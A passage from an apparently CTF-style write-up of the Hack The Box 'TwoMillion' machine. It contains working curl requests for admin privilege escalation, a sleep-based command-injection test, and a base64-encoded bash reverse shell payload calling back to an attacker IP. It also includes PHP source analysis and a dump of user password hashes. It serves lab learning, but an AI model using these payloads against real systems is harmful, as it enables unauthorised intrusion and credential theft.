</span></span><span style=display:flex><span><span style=color:#fe8019>{</span><span style=color:#b8bb26>&#34;status&#34;</span>:<span style=color:#b8bb26>&#34;danger&#34;</span>,<span style=color:#b8bb26>&#34;message&#34;</span>:<span style=color:#b8bb26>&#34;Missing parameter: email&#34;</span><span style=color:#fe8019>}</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span> curl -XPUT <span style=color:#b8bb26>&#39;http://2million.htb/api/v1/admin/settings/update&#39;</span> -H <span style=color:#b8bb26>&#39;Cookie: PHPSESSID=rkdg35h0k13lm3asa5vhjv4lt8&#39;</span> -H <span style=color:#b8bb26>&#39;Content-Type: application/json&#39;</span> -d <span style=color:#b8bb26>&#39;{&#34;email&#34;: &#34;admin@2million.htb&#34;}&#39;</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>{</span><span style=color:#b8bb26>&#34;status&#34;</span>:<span style=color:#b8bb26>&#34;danger&#34;</span>,<span style=color:#b8bb26>&#34;message&#34;</span>:<span style=color:#b8bb26>&#34;Missing parameter: is_admin&#34;</span><span style=color:#fe8019>}</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span> curl -XPUT <span style=color:#b8bb26>&#39;http://2million.htb/api/v1/admin/settings/update&#39;</span> -H <span style=color:#b8bb26>&#39;Cookie: PHPSESSID=rkdg35h0k13lm3asa5vhjv4lt8&#39;</span> -H <span style=color:#b8bb26>&#39;Content-Type: application/json&#39;</span> -d <span style=color:#b8bb26>&#39;{&#34;email&#34;: &#34;admin@2million.htb&#34;, &#34;is_admin&#34;: 1}&#39;</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>{</span><span style=color:#b8bb26>&#34;status&#34;</span>:<span style=color:#b8bb26>&#34;danger&#34;</span>,<span style=color:#b8bb26>&#34;message&#34;</span>:<span style=color:#b8bb26>&#34;Email not found.&#34;</span><span style=color:#fe8019>}</span>
</span></span></code></pre></div><p>After some trial and error we got all of the necessary parameters. Now lets try using the email we created the account with and see what happens.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span> curl -XPUT <span style=color:#b8bb26>&#39;http://2million.htb/api/v1/admin/settings/update&#39;</span> -H <span style=color:#b8bb26>&#39;Cookie: PHPSESSID=rkdg35h0k13lm3asa5vhjv4lt8&#39;</span> -H <span style=color:#b8bb26>&#39;Content-Type: application/json&#39;</span>  -d <span style=color:#b8bb26>&#39;{&#34;email&#34;: &#34;randomuser@2million.htb&#34;, &#34;is_admin&#34;: 1}&#39;</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>{</span><span style=color:#b8bb26>&#34;id&#34;</span>:14,<span style=color:#b8bb26>&#34;username&#34;</span>:<span style=color:#b8bb26>&#34;randomuser&#34;</span>,<span style=color:#b8bb26>&#34;is_admin&#34;</span>:1<span style=color:#fe8019>}</span>
</span></span></code></pre></div><p>Great! looks like we are admin now. Let&rsquo;s confirm it by sending a request to the <code>/admin/auth</code> api endpoint.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span> curl -XGET <span style=color:#b8bb26>&#39;http://2million.htb/api/v1/admin/auth&#39;</span> -H <span style=color:#b8bb26>&#39;Cookie: PHPSESSID=rkdg35h0k13lm3asa5vhjv4lt8&#39;</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>{</span><span style=color:#b8bb26>&#34;message&#34;</span>:true<span style=color:#fe8019>}</span>
</span></span></code></pre></div><p>Yup we are admin!</p><p>Let&rsquo;s check the <code>/api/v1/admin/vpn/generate</code> endpoint. Again after some trial and error we can see that it requires a <code>username</code> parameter to work. Let&rsquo;s give it ours and see the generated output.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span> curl -XPOST <span style=color:#b8bb26>&#39;http://2million.htb/api/v1/admin/vpn/generate&#39;</span> -H <span style=color:#b8bb26>&#39;Cookie: PHPSESSID=rkdg35h0k13lm3asa5vhjv4lt8&#39;</span> -H <span style=color:#b8bb26>&#39;Content-Type: application/json&#39;</span> -d <span style=color:#b8bb26>&#39;{&#34;username&#34;: &#34;randomuser&#34;}&#39;</span>
</span></span><span style=display:flex><span>client
</span></span><span style=display:flex><span>dev tun
</span></span><span style=display:flex><span>proto udp
</span></span><span style=display:flex><span>remote edge-eu-free-1.2million.htb <span style=color:#d3869b>1337</span>
</span></span><span style=display:flex><span>resolv-retry infinite
</span></span><span style=display:flex><span>nobind
</span></span><span style=display:flex><span>persist-key
</span></span><span style=display:flex><span>persist-tun
</span></span><span style=display:flex><span>remote-cert-tls server
</span></span><span style=display:flex><span>comp-lzo
</span></span><span style=display:flex><span>verb <span style=color:#d3869b>3</span>
</span></span><span style=display:flex><span>data-ciphers-fallback AES-128-CBC
</span></span><span style=display:flex><span>data-ciphers AES-256-CBC:AES-256-CFB:AES-256-CFB1:AES-256-CFB8:AES-256-OFB:AES-256-GCM
</span></span><span style=display:flex><span>tls-cipher <span style=color:#b8bb26>&#34;DEFAULT:@SECLEVEL=0&#34;</span>
</span></span><span style=display:flex><span>auth SHA256
</span></span><span style=display:flex><span>key-direction <span style=color:#d3869b>1</span>
</span></span><span style=display:flex><span>&lt;ca&gt;
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>..........SNIP..........
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>-----END OpenVPN Static key V1-----
</span></span><span style=display:flex><span>&lt;/tls-auth&gt;
</span></span></code></pre></div><p>If you check the vpn file generated we can see that the value of the <code>username</code> parameter is reflected in there:</p><figure><img src=/img/two-million/vpn.webp></figure><p>If proper validation is not done then we could try some injection type vulerability and check if anything is working.</p><hr><h2 id=exploitation><a href=#exploitation class=anchor-head aria-label=Anchor></a>Exploitation</h2><h3 id=rce><a href=#rce class=anchor-head aria-label=Anchor></a>RCE</h3><p>We can see that the username is reflecting in the vpn file generated. First I tested for rce in the <code>username</code> parameter. But unfortunately the output is not showing when the username is changed so something is stopping the execution when we input rce payloads. One way w can test the rce is by using the <code>sleep</code> command and check the time delay:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span> <span style=color:#fabd2f>time</span> curl --silent  -XPOST <span style=color:#b8bb26>&#39;http://2million.htb/api/v1/admin/vpn/generate&#39;</span> -H <span style=color:#b8bb26>&#39;Cookie: PHPSESSID=rkdg35h0k13lm3asa5vhjv4lt8&#39;</span> -H <span style=color:#b8bb26>&#39;Content-Type: application/json&#39;</span> -d <span style=color:#b8bb26>&#39;{&#34;username&#34;: &#34;randomuser&#34;}&#39;</span> &gt; <span style=color:#fabd2f>test</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>________________________________________________________
</span></span><span style=display:flex><span>Executed in    1.81 secs      fish           external
</span></span><span style=display:flex><span>   usr <span style=color:#fabd2f>time</span>    8.23 millis    1.21 millis    7.03 millis
</span></span><span style=display:flex><span>   sys <span style=color:#fabd2f>time</span>    7.17 millis    0.14 millis    7.03 millis
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span> <span style=color:#fabd2f>time</span> curl --silent  -XPOST <span style=color:#b8bb26>&#39;http://2million.htb/api/v1/admin/vpn/generate&#39;</span> -H <span style=color:#b8bb26>&#39;Cookie: PHPSESSID=rkdg35h0k13lm3asa5vhjv4lt8&#39;</span> -H <span style=color:#b8bb26>&#39;Content-Type: application/json&#39;</span> -d <span style=color:#b8bb26>&#39;{&#34;username&#34;: &#34;randomuser;sleep 5&#34;}&#39;</span> &gt; <span style=color:#fabd2f>test</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>________________________________________________________
</span></span><span style=display:flex><span>Executed in    6.21 secs      fish           external
</span></span><span style=display:flex><span>   usr <span style=color:#fabd2f>time</span>   11.54 millis    1.06 millis   10.48 millis
</span></span><span style=display:flex><span>   sys <span style=color:#fabd2f>time</span>    3.62 millis    0.12 millis    3.50 millis
</span></span></code></pre></div><p>See the time difference:</p><figure><img src=/img/two-million/rce-test.webp></figure><p>Now we can confirm RCE. So let&rsquo;s exploit it by adding a reverse shell payload from <a href=https://www.revshells.com/>revshells.com</a></p><p>Here I used base64 encoding to make the payload work without producing any errors.</p><figure><img src=/img/two-million/revshells.webp></figure><p>We can send a POST request with the payload to get a shell:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span> curl --silent  -XPOST <span style=color:#b8bb26>&#39;http://2million.htb/api/v1/admin/vpn/generate&#39;</span> -H <span style=color:#b8bb26>&#39;Cookie: PHPSESSID=rkdg35h0k13lm3asa5vhjv4lt8&#39;</span> -H <span style=color:#b8bb26>&#39;Content-Type: application/json&#39;</span> -d <span style=color:#b8bb26>&#39;{&#34;username&#34;: &#34;randomuser;echo \&#39;</span>MDwmMTk2O2V4ZWMgMTk2PD4vZGV2L3RjcC8xMC4xMC4xNC42MC8xMjM0OyBiYXNoIDwmMTk2ID4mMTk2IDI+JjE5Ng<span style=color:#fe8019>==</span><span style=color:#b8bb26>\&#39;</span>| base64 -d | bash<span style=color:#b8bb26>&#34;}&#39;
</span></span></span></code></pre></div><p>And we got shell as <code>www-data</code></p><figure><img src=/img/two-million/revshell.webp></figure><hr><h2 id=lateral-movement-to-user><a href=#lateral-movement-to-user class=anchor-head aria-label=Anchor></a>Lateral Movement to user</h2><h3 id=local-enumeration><a href=#local-enumeration class=anchor-head aria-label=Anchor></a>Local Enumeration</h3><p>There&rsquo;s a <code>.env</code> file with some database credentials. We could probably use it to check the database for any valuable information or try to use the username and password to ssh into the machine (since <code>admin</code> user is present in the <code>/etc/passwd</code> file)</p><figure><img src=/img/two-million/db-pass.webp></figure><p>But before that let&rsquo;s check what&rsquo;s actually happening in the php files.</p><h3 id=source-code-analysis><a href=#source-code-analysis class=anchor-head aria-label=Anchor></a>Source code analysis:</h3><p>if you check the <code>controllers/AdminController.php</code> file in the <code>api/v1/admin/update/settings</code> endpoint they are already checking whether the current user is admin or not. If the <code>$is_admin</code> variable is false then it simply exits. Then how we are able to visit the endpoint?</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-php data-lang=php><span style=display:flex><span> <span style=color:#fe8019>public</span> <span style=color:#fe8019>function</span> <span style=color:#fabd2f>update_settings</span>($router) {
</span></span><span style=display:flex><span>        $db <span style=color:#fe8019>=</span> Database<span style=color:#fe8019>::</span><span style=color:#b8bb26;font-weight:700>getDatabase</span>();
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>        $is_admin <span style=color:#fe8019>=</span> $this<span style=color:#fe8019>-&gt;</span><span style=color:#b8bb26;font-weight:700>is_admin</span>($router);
</span></span><span style=display:flex><span>        <span style=color:#fe8019>if</span> (<span style=color:#fe8019>!</span>$is_admin) {
</span></span><span style=display:flex><span>            <span style=color:#fe8019>return</span> header(<span style=color:#b8bb26>&#34;HTTP/1.1 401 Unauthorized&#34;</span>);
</span></span><span style=display:flex><span>            <span style=color:#fe8019>exit</span>;
</span></span><span style=display:flex><span>        }
</span></span></code></pre></div><p>It is using the <code>is_admin()</code> function to check whether we are admin and stores the return value to <code>$is_admin</code> variable. Then inside and if statement its just checking <code>!$is_admin</code>.
So the <code>is_admin()</code> should return either <code>TRUE</code> or <code>FALSE</code> right? right?</p><p>NOP!</p><p>The <code>is_admin()</code> function is just returning a json output and the <code>TRUE</code> and <code>FALSE</code> values are just inside the json data:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-php data-lang=php><span style=display:flex><span><span style=color:#fe8019>public</span> <span style=color:#fe8019>function</span> <span style=color:#fabd2f>is_admin</span>($router)
</span></span><span style=display:flex><span>    {
</span></span><span style=display:flex><span>        <span style=color:#fe8019>if</span> (<span style=color:#fe8019>!</span>isset($_SESSION) <span style=color:#fe8019>||</span> <span style=color:#fe8019>!</span>isset($_SESSION[<span style=color:#b8bb26>&#39;loggedin&#39;</span>]) <span style=color:#fe8019>||</span> $_SESSION[<span style=color:#b8bb26>&#39;loggedin&#39;</span>] <span style=color:#fe8019>!==</span> <span style=color:#fe8019>true</span> <span style=color:#fe8019>||</span> <span style=color:#fe8019>!</span>isset($_SESSION[<span style=color:#b8bb26>&#39;username&#39;</span>])) {
</span></span><span style=display:flex><span>            <span style=color:#fe8019>return</span> header(<span style=color:#b8bb26>&#34;HTTP/1.1 401 Unauthorized&#34;</span>);
</span></span><span style=display:flex><span>            <span style=color:#fe8019>exit</span>;
</span></span><span style=display:flex><span>        }
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>        $db <span style=color:#fe8019>=</span> Database<span style=color:#fe8019>::</span><span style=color:#b8bb26;font-weight:700>getDatabase</span>();
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>        $stmt <span style=color:#fe8019>=</span> $db<span style=color:#fe8019>-&gt;</span><span style=color:#b8bb26;font-weight:700>query</span>(<span style=color:#b8bb26>&#39;SELECT is_admin FROM users WHERE username = ?&#39;</span>, [<span style=color:#b8bb26>&#39;s&#39;</span> <span style=color:#fe8019>=&gt;</span> [$_SESSION[<span style=color:#b8bb26>&#39;username&#39;</span>]]]);
</span></span><span style=display:flex><span>        $user <span style=color:#fe8019>=</span> $stmt<span style=color:#fe8019>-&gt;</span><span style=color:#b8bb26;font-weight:700>fetch_assoc</span>();
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>        <span style=color:#fe8019>if</span> ($user[<span style=color:#b8bb26>&#39;is_admin&#39;</span>] <span style=color:#fe8019>==</span> <span style=color:#d3869b>1</span>) {
</span></span><span style=display:flex><span>            header(<span style=color:#b8bb26>&#39;Content-Type: application/json&#39;</span>);
</span></span><span style=display:flex><span>            <span style=color:#fe8019>return</span> json_encode([<span style=color:#b8bb26>&#39;message&#39;</span> <span style=color:#fe8019>=&gt;</span> <span style=color:#fe8019>TRUE</span>]);
</span></span><span style=display:flex><span>        } <span style=color:#fe8019>else</span> {
</span></span><span style=display:flex><span>            header(<span style=color:#b8bb26>&#39;Content-Type: application/json&#39;</span>);
</span></span><span style=display:flex><span>            <span style=color:#fe8019>return</span> json_encode([<span style=color:#b8bb26>&#39;message&#39;</span> <span style=color:#fe8019>=&gt;</span> <span style=color:#fe8019>FALSE</span>]);
</span></span><span style=display:flex><span>        }
</span></span><span style=display:flex><span>    }
</span></span></code></pre></div><p>So whatever the return value is the if block inside the <code>update_settings()</code> function is just not going to work. Because the value of <code>$is_admin</code> will never be interpreted as <code>FALSE</code>.
In order to fix the issue we have to use <code>json_decode()</code> and check the value of <code>message</code>. It would be something like this:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-php data-lang=php><span style=display:flex><span><span style=color:#b8bb26>``</span>`php
</span></span><span style=display:flex><span> <span style=color:#fe8019>public</span> <span style=color:#fe8019>function</span> <span style=color:#fabd2f>update_settings</span>($router) {
</span></span><span style=display:flex><span>        $db <span style=color:#fe8019>=</span> Database<span style=color:#fe8019>::</span><span style=color:#b8bb26;font-weight:700>getDatabase</span>();
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>        $json <span style=color:#fe8019>=</span> json_decode($this<span style=color:#fe8019>-&gt;</span><span style=color:#b8bb26;font-weight:700>is_admin</span>($router));
</span></span><span style=display:flex><span>        <span style=color:#fe8019>if</span> (<span style=color:#fe8019>!</span>$json<span style=color:#fe8019>-&gt;</span><span style=color:#b8bb26;font-weight:700>message</span>) {
</span></span><span style=display:flex><span>            <span style=color:#fe8019>return</span> header(<span style=color:#b8bb26>&#34;HTTP/1.1 401 Unauthorized&#34;</span>);
</span></span><span style=display:flex><span>            <span style=color:#fe8019>exit</span>;
</span></span><span style=display:flex><span>        }
</span></span></code></pre></div><p>Hopefully this should work (I haven&rsquo;t tested it).</p><p>Ok now let&rsquo;s move on the <code>controllers/VPNController.php</code> file where the <code>/api/v1/admin/vpn/generate</code> endpoint is defined:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-php data-lang=php><span style=display:flex><span><span style=color:#fe8019>public</span> <span style=color:#fe8019>function</span> <span style=color:#fabd2f>admin_vpn</span>($router) {
</span></span><span style=display:flex><span>        <span style=color:#fe8019>if</span> (<span style=color:#fe8019>!</span>isset($_SESSION[<span style=color:#b8bb26>&#39;loggedin&#39;</span>]) <span style=color:#fe8019>||</span> $_SESSION[<span style=color:#b8bb26>&#39;loggedin&#39;</span>] <span style=color:#fe8019>!==</span> <span style=color:#fe8019>true</span>) {
</span></span><span style=display:flex><span>            <span style=color:#fe8019>return</span> header(<span style=color:#b8bb26>&#34;HTTP/1.1 401 Unauthorized&#34;</span>);
</span></span><span style=display:flex><span>            <span style=color:#fe8019>exit</span>;
</span></span><span style=display:flex><span>        }
</span></span><span style=display:flex><span>        <span style=color:#fe8019>if</span> (<span style=color:#fe8019>!</span>isset($_SESSION[<span style=color:#b8bb26>&#39;is_admin&#39;</span>]) <span style=color:#fe8019>||</span> $_SESSION[<span style=color:#b8bb26>&#39;is_admin&#39;</span>] <span style=color:#fe8019>!==</span> <span style=color:#d3869b>1</span>) {
</span></span><span style=display:flex><span>            <span style=color:#fe8019>return</span> header(<span style=color:#b8bb26>&#34;HTTP/1.1 401 Unauthorized&#34;</span>);
</span></span><span style=display:flex><span>            <span style=color:#fe8019>exit</span>;
</span></span><span style=display:flex><span>        }
</span></span><span style=display:flex><span>        <span style=color:#fe8019>if</span> (<span style=color:#fe8019>!</span>isset($_SERVER[<span style=color:#b8bb26>&#39;CONTENT_TYPE&#39;</span>]) <span style=color:#fe8019>||</span> $_SERVER[<span style=color:#b8bb26>&#39;CONTENT_TYPE&#39;</span>] <span style=color:#fe8019>!==</span> <span style=color:#b8bb26>&#39;application/json&#39;</span>) {
</span></span><span style=display:flex><span>            <span style=color:#fe8019>return</span> json_encode([
</span></span><span style=display:flex><span>                <span style=color:#b8bb26>&#39;status&#39;</span> <span style=color:#fe8019>=&gt;</span> <span style=color:#b8bb26>&#39;danger&#39;</span>,
</span></span><span style=display:flex><span>                <span style=color:#b8bb26>&#39;message&#39;</span> <span style=color:#fe8019>=&gt;</span> <span style=color:#b8bb26>&#39;Invalid content type.&#39;</span>
</span></span><span style=display:flex><span>            ]);
</span></span><span style=display:flex><span>            <span style=color:#fe8019>exit</span>;
</span></span><span style=display:flex><span>        }
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>        $body <span style=color:#fe8019>=</span> file_get_contents(<span style=color:#b8bb26>&#39;php://input&#39;</span>);
</span></span><span style=display:flex><span>        $json <span style=color:#fe8019>=</span> json_decode($body);
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>        <span style=color:#fe8019>if</span> (<span style=color:#fe8019>!</span>isset($json)) {
</span></span><span style=display:flex><span>            <span style=color:#fe8019>return</span> json_encode([
</span></span><span style=display:flex><span>                <span style=color:#b8bb26>&#39;status&#39;</span> <span style=color:#fe8019>=&gt;</span> <span style=color:#b8bb26>&#39;danger&#39;</span>,
</span></span><span style=display:flex><span>                <span style=color:#b8bb26>&#39;message&#39;</span> <span style=color:#fe8019>=&gt;</span> <span style=color:#b8bb26>&#39;Missing parameter: username&#39;</span>
</span></span><span style=display:flex><span>            ]);
</span></span><span style=display:flex><span>            <span style=color:#fe8019>exit</span>;
</span></span><span style=display:flex><span>        }
</span></span><span style=display:flex><span>        <span style=color:#fe8019>if</span> (<span style=color:#fe8019>!</span>$json<span style=color:#fe8019>-&gt;</span><span style=color:#b8bb26;font-weight:700>username</span>) {
</span></span><span style=display:flex><span>            <span style=color:#fe8019>return</span> json_encode([
</span></span><span style=display:flex><span>                <span style=color:#b8bb26>&#39;status&#39;</span> <span style=color:#fe8019>=&gt;</span> <span style=color:#b8bb26>&#39;danger&#39;</span>,
</span></span><span style=display:flex><span>                    <span style=color:#b8bb26>&#39;message&#39;</span> <span style=color:#fe8019>=&gt;</span> <span style=color:#b8bb26>&#39;Missing parameter: username&#39;</span>
</span></span><span style=display:flex><span>            ]);
</span></span><span style=display:flex><span>            <span style=color:#fe8019>exit</span>;
</span></span><span style=display:flex><span>        }
</span></span><span style=display:flex><span>        $username <span style=color:#fe8019>=</span> $json<span style=color:#fe8019>-&gt;</span><span style=color:#b8bb26;font-weight:700>username</span>;
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>        $this<span style=color:#fe8019>-&gt;</span><span style=color:#b8bb26;font-weight:700>regenerate_user_vpn</span>($router, $username);
</span></span><span style=display:flex><span>        $output <span style=color:#fe8019>=</span> shell_exec(<span style=color:#b8bb26>&#34;/usr/bin/cat /var/www/html/VPN/user/</span><span style=color:#b8bb26>$username</span><span style=color:#b8bb26>.ovpn&#34;</span>);
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>        <span style=color:#fe8019>return</span> is_array($output) <span style=color:#fe8019>?</span> implode(<span style=color:#b8bb26>&#34;&lt;br&gt;&#34;</span>, $output) <span style=color:#fe8019>:</span> $output;
</span></span><span style=display:flex><span>    }
</span></span></code></pre></div><p>The function is passing the <code>$username</code> variable to <code>regenerate_user_vpn()</code> function:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-php data-lang=php><span style=display:flex><span><span style=color:#fe8019>public</span> <span style=color:#fe8019>function</span> <span style=color:#fabd2f>regenerate_user_vpn</span>($router, $user <span style=color:#fe8019>=</span> <span style=color:#fe8019>null</span>) {
</span></span><span style=display:flex><span>        <span style=color:#fe8019>if</span> ($user <span style=color:#fe8019>!=</span> <span style=color:#fe8019>null</span>) {
</span></span><span style=display:flex><span>            exec(<span style=color:#b8bb26>&#34;/bin/bash /var/www/html/VPN/gen.sh </span><span style=color:#b8bb26>$user</span><span style=color:#b8bb26>&#34;</span>, $output, $return_var);
</span></span><span style=display:flex><span>        } <span style=color:#fe8019>else</span> {
</span></span><span style=display:flex><span>            <span style=color:#fe8019>if</span> (<span style=color:#fe8019>!</span>isset($_SESSION[<span style=color:#b8bb26>&#39;loggedin&#39;</span>]) <span style=color:#fe8019>||</span> $_SESSION[<span style=color:#b8bb26>&#39;loggedin&#39;</span>] <span style=color:#fe8019>!==</span> <span style=color:#fe8019>true</span>) {
</span></span><span style=display:flex><span>                <span style=color:#fe8019>return</span> header(<span style=color:#b8bb26>&#34;HTTP/1.1 401 Unauthorized&#34;</span>);
</span></span><span style=display:flex><span>                <span style=color:#fe8019>exit</span>;
</span></span><span style=display:flex><span>            }
</span></span><span style=display:flex><span>            <span style=color:#fe8019>if</span> (<span style=color:#fe8019>!</span>isset($_SESSION[<span style=color:#b8bb26>&#39;username&#39;</span>]) <span style=color:#fe8019>||</span> $_SESSION[<span style=color:#b8bb26>&#39;username&#39;</span>] <span style=color:#fe8019>==</span> <span style=color:#fe8019>null</span>) {
</span></span><span style=display:flex><span>                <span style=color:#fe8019>return</span> header(<span style=color:#b8bb26>&#34;HTTP/1.1 401 Unauthorized&#34;</span>);
</span></span><span style=display:flex><span>                <span style=color:#fe8019>exit</span>;
</span></span><span style=display:flex><span>            }
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>            $username <span style=color:#fe8019>=</span> $this<span style=color:#fe8019>-&gt;</span><span style=color:#b8bb26;font-weight:700>remove_special_chars</span>($_SESSION[<span style=color:#b8bb26>&#39;username&#39;</span>]);
</span></span><span style=display:flex><span>            $fileName <span style=color:#fe8019>=</span> $username<span style=color:#fe8019>.</span> <span style=color:#b8bb26>&#34;.ovpn&#34;</span>;
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>            exec(<span style=color:#b8bb26>&#34;/bin/bash /var/www/html/VPN/gen.sh </span><span style=color:#b8bb26>$username</span><span style=color:#b8bb26>&#34;</span>, $output, $return_var);
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>            $this<span style=color:#fe8019>-&gt;</span><span style=color:#b8bb26;font-weight:700>download_vpn</span>($fileName);
</span></span><span style=display:flex><span>        }
</span></span><span style=display:flex><span>    }
</span></span></code></pre></div><p>The function is using <code>exec()</code> function to generate the vpn file if simply <code>$user</code> is not <code>null</code>. Great.</p><p>Anyway&mldr; let&rsquo;s move on to the next step.</p><h3 id=lateral-movement-vector><a href=#lateral-movement-vector class=anchor-head aria-label=Anchor></a>Lateral Movement vector</h3><p>First let&rsquo;s login to mysql.</p><figure><img src=/img/two-million/mysql-login.webp></figure><p>There are two tables - <code>invite_codes</code> and <code>users</code>:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-mysql data-lang=mysql><span style=display:flex><span>MariaDB [htb_prod]<span style=color:#fe8019>&gt;</span> <span style=color:#fe8019>show</span> <span style=color:#fe8019>tables</span>;
</span></span><span style=display:flex><span><span style=color:#fe8019>+--------------------+</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>|</span> Tables_in_htb_prod <span style=color:#fe8019>|</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>+--------------------+</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>|</span> invite_codes       <span style=color:#fe8019>|</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>|</span> users              <span style=color:#fe8019>|</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>+--------------------+</span>
</span></span><span style=display:flex><span><span style=color:#d3869b>2</span> rows <span style=color:#fe8019>in</span> <span style=color:#fabd2f>set</span> (<span style=color:#d3869b>0</span>.<span style=color:#d3869b>000</span> sec)
</span></span></code></pre></div><figure><img src=/img/two-million/mysql-tables.webp></figure><p><code>invite_codes</code> probably contain the codes for the invite challenge. We could find usernames and credentials of the accounts created in the <code>users</code> table:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-mysql data-lang=mysql><span style=display:flex><span>MariaDB [htb_prod]<span style=color:#fe8019>&gt;</span> <span style=color:#fe8019>select</span> <span style=color:#fe8019>*</span> <span style=color:#fe8019>from</span> users;
</span></span><span style=display:flex><span><span style=color:#fe8019>+----+--------------+----------------------------+--------------------------------------------------------------+----------+</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>|</span> id <span style=color:#fe8019>|</span> username     <span style=color:#fe8019>|</span> email                      <span style=color:#fe8019>|</span> password                                                     <span style=color:#fe8019>|</span> is_admin <span style=color:#fe8019>|</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>+----+--------------+----------------------------+--------------------------------------------------------------+----------+</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>|</span> <span style=color:#d3869b>11</span> <span style=color:#fe8019>|</span> TRX          <span style=color:#fe8019>|</span> trx<span style=color:#fe8019>@</span>hackthebox.eu          <span style=color:#fe8019>|</span> $<span style=color:#d3869b>2</span>y$<span style=color:#d3869b>10</span>$TG6oZ3ow5UZhLlw7MDME5um7j<span style=color:#fe8019>/</span><span style=color:#d3869b>7</span>Cw1o6BhY8RhHMnrr2ObU3loEMq <span style=color:#fe8019>|</span>        <span style=color:#d3869b>1</span> <span style=color:#fe8019>|</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>|</span> <span style=color:#d3869b>12</span> <span style=color:#fe8019>|</span> TheCyberGeek <span style=color:#fe8019>|</span> thecybergeek<span style=color:#fe8019>@</span>hackthebox.eu <span style=color:#fe8019>|</span> $<span style=color:#d3869b>2</span>y$<span style=color:#d3869b>10</span>$wATidKUukcOeJRaBpYtOyekSpwkKghaNYr5pjsomZUKAd0wbzw4QK <span style=color:#fe8019>|</span>        <span style=color:#d3869b>1</span> <span style=color:#fe8019>|</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>|</span> <span style=color:#d3869b>13</span> <span style=color:#fe8019>|</span> admin        <span style=color:#fe8019>|</span> admin<span style=color:#fe8019>@</span>admin.com            <span style=color:#fe8019>|</span> $<span style=color:#d3869b>2</span>y$<span style=color:#d3869b>10</span>$N.hsJNfoYPGV3SGCcTYcmO5CeJ6P6mDxJS11jmAX4C<span style=color:#fe8019>/</span>FZ2qzEX8Qm <span style=color:#fe8019>|</span>        <span style=color:#d3869b>1</span> <span style=color:#fe8019>|</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>|</span> <span style=color:#d3869b>14</span> <span style=color:#fe8019>|</span> randomuser   <span style=color:#fe8019>|</span> randomuser<span style=color:#fe8019>@</span><span style=color:#d3869b>2</span>million.htb    <span style=color:#fe8019>|</span> $<span style=color:#d3869b>2</span>y$<span style=color:#d3869b>10</span>$MdxNNwxCAbufgaCEMsv7SeHG4yLyB551P40eAtOpqDDGJOiZHoT<span style=color:#fe8019>/</span>S <span style=color:#fe8019>|</span>        <span style=color:#d3869b>1</span> <span style=color:#fe8019>|</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>+----+--------------+----------------------------+--------------------------------------------------------------+----------+</span>
</span></span><span style=display:flex><span><span style=color:#d3869b>4</span> rows <span style=color:#fe8019>in</span> <span style=color:#fabd2f>set</span> (<span style=color:#d3869b>0</span>.<span style=color:#d3869b>000</span> sec)
